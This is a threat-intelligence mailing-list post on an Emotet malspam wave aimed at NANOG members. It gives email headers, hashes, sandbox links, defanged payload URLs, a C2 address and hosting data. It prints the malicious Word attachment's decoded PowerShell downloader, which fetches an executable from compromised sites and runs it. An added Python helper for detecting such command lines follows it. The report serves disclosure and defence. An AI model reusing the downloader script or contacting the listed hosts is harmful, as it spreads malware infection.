29 May 2019: Emotet malspam: 'Mykolab Ref Id: I32560' [Was: Re: Spamming of NANOG list members]

Paul Ferguson fergdawgster at mykolab.com
Wed May 29 16:03:49 UTC 2019


*Just an FYI, the obfuscated URLs and IPs below are malicious.*

This is apparently (?) part of a wave of spoofed malspams impersonating messages with 'weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list. Background:

https://mailman.nanog.org/pipermail/nanog/2019-May/101140.html

Details:

Date: Wed, 29 May 2019 10:03:04 -0500
From: "NANOG" <Helene.Rouleau at paral.ca>
To: "Paul Ferguson" <fergdawgster at mykolab.com>
Subject: Mykolab Ref Id: I32560
X-Authenticated-Sender: s214.panelboxmanager.com
Return-Path: <Helene.Rouleau at paral.ca>
Attachment: "ATTACHMENT 654860 I32560.doc"

MD5:	49fbc31d5e46d83c4741d64a1c268e8d
SHA-1:	62b00133e2a78063b76a473a9c0b42a00b3042b8
SHA256:	8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5
File Type:	MS Word Document
Magic	CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 28 12:55:00 2019, Last Saved Time/Date: Tue May 28 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
SSDeep:	3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z
TRiD:	Microsoft Word document (54.2%)
	Microsoft Word document (old ver.) (32.2%)
	Generic OLE2 / Multistream Compound File (13.5%)
File Size: 136.38 KB

Analysis:
VT: https://www.virustotal.com/#/file/8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5/detection
HA: https://www.hybrid-analysis.com/sample/8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5/5ceea3ee02883814847b23d1
Joe Sandbox: https://www.joesandbox.com/analysis/136644/0/executive
app.any.run: https://app.any.run/tasks/18d747ef-42d6-40e8-b496-6eb54c5f5dac

Embedded PowerShell script does:

 WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256)
powershell.exe powershell -nop -e [...] (PID: 2624,Additional Context:
$ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ')
    936.exe (PID: 2888) 24/72
    936.exe --26d066e0 (PID: 2932) 24/72
enablerouting.exe (PID: 272)
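As an added example (not part of the post above, and not any tool it names), here is a small Python triage helper that does what an analyst does with a `powershell -nop -e` line like the one in the process tree: decode the base64/UTF-16LE argument, strip the two cheap obfuscations the decoded script uses (backticks inside identifiers such as Net`.WeBC`L`IENt, and cmdlet names assembled from string pieces such as .('new-'+'obj'+'ect')), then match the downloader behaviours the script exhibits (WebClient, DownloadFile into the user profile, an '@'-split list of fallback URLs, a size check, Process::Start). The sample command line is constructed here with placeholder `.invalid` hosts; the indicator strings, names and verdict thresholds are my own assumptions, not from the post.

```python
import base64
import re

# --- decoding the -e / -encodedcommand argument -----------------------------
ENCODED_ARG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script carried by -e/-encodedcommand, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# --- undoing the obfuscation seen in the decoded downloader -----------------
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")        # 'a'+'b'
CALL_OPERATOR = re.compile(r"[&.]\(\s*'([^']+)'\s*\)")   # .('new-object')


def normalize(script):
    """Remove backticks from identifiers, fold 'a'+'b'+'c' into 'abc',
    turn &('cmd')/.('cmd') into cmd, and lower-case the result."""
    s = script.replace("`", "")
    while True:
        s, n = CONCAT.subn(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if n == 0:
            break
    s = CALL_OPERATOR.sub(r"\1", s)
    return s.lower()


# Behaviours to look for in the normalized script (assumed indicator set).
INDICATORS = {
    "new-object net.webclient": "WebClient instantiated",
    ".downloadfile(": "file downloaded to disk",
    "$env:userprofile": "drop path under the user profile",
    ".split('@')": "@-separated list of fallback URLs",
    "foreach(": "loop over the URL list",
    "[diagnostics.process]::start(": "downloaded file executed",
}


def assess(cmdline):
    """Decode, normalize and score one process command line.
    Returns a dict whose 'verdict' is 'downloader', 'suspicious' or 'clean'."""
    script = decode_encoded_command(cmdline)
    result = {"encoded": script is not None}
    if script is None:
        script = cmdline                    # inspect plain -c/-command lines too
    result["obfuscation"] = {
        "backticks": script.count("`"),
        "concatenated_strings": len(CONCAT.findall(script)),
    }
    norm = normalize(script)
    result["indicators"] = [d for pat, d in INDICATORS.items() if pat in norm]
    hits = set(result["indicators"])
    if {"file downloaded to disk", "downloaded file executed"} <= hits:
        result["verdict"] = "downloader"
    elif hits or sum(result["obfuscation"].values()) > 0:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "clean"
    return result


# Constructed sample: same structure as the decoded script in the post,
# with placeholder hosts instead of the real payload URLs.
SAMPLE_SCRIPT = (
    "$p=$env:userprofile+'\\'+'936'+'.exe';"
    "$c=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;"
    "$u='http://host-a.invalid/x/@http://host-b.invalid/y/'.SPLiT('@');"
    "foreach($l in $u){try{$c.DowNLOadFILE($l,$p);"
    "If ((&('Get-'+'Ite'+'m') $p).lEngTH -ge 29780){"
    "[Diagnostics.Process]::START($p);break}}catch{}}"
)
SAMPLE_CMDLINE = "powershell -nop -e " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()
BENIGN_CMDLINE = "powershell -nop -c Get-ChildItem"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(assess(line))
```

Run as a script it prints one assessment per command line; in a pipeline you would feed it the CommandLine field of process-creation events (Sysmon EventID 1 or 4688) for powershell.exe and alert on the 'downloader' verdict.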

'Payload quintet' from script above (compromised pages):

http://ceo.calcus[.]com/postnewo/RwhvOlZIs/
http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/
http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/
http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/


Observed network activity:
GET	ceo.calcus[.]com/postnewo/RwhvOlZIs/
GET	lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
POST	31.12.67[.]62:7080/acquire/tlb/ringin/


 Non-authoritative answer:
 Name:	ceo.calcus[.]com
 Address: 68.183.65[.]234

 Non-authoritative answer:
 Name:	lastminutelollipop[.]com
 Address: 158.69.127[.]22

 Non-authoritative answer:
 Name:	kashmirhackers[.]com
 Address: 173.249.2[.]31

 Non-authoritative answer:
 Name:	omegaconsultoriacontabil[.]com.br
 Address: 74.63.242[.]18

 Non-authoritative answer:
 Name:	nottspcrepair[.]co.uk
 Address: 185.38.44[.]163



AS      | IP               | AS Name
14061   | 68.183.65[.]234    | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting)
16276   | 158.69.127[.]22    | OVH, FR (shared hosting)
51167   | 173.249.2[.]31     | CONTABO, DE (shared hosting)
46475   | 74.63.242[.]18     | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting)
33182   | 185.38.44[.]163    | DIMENOC - HostDime.com, Inc., US (shared hosting)
44099   | 31.12.67[.]62      | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record)


FYI,

- ferg


—
Paul Ferguson
Principal, Threat Intelligence
Gigamon
Seattle, Washington, USA




-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 228 bytes
Desc: Message signed with OpenPGP
URL: <http://mailman.nanog.org/pipermail/nanog/attachments/20190529/fbf244c9/attachment.sig>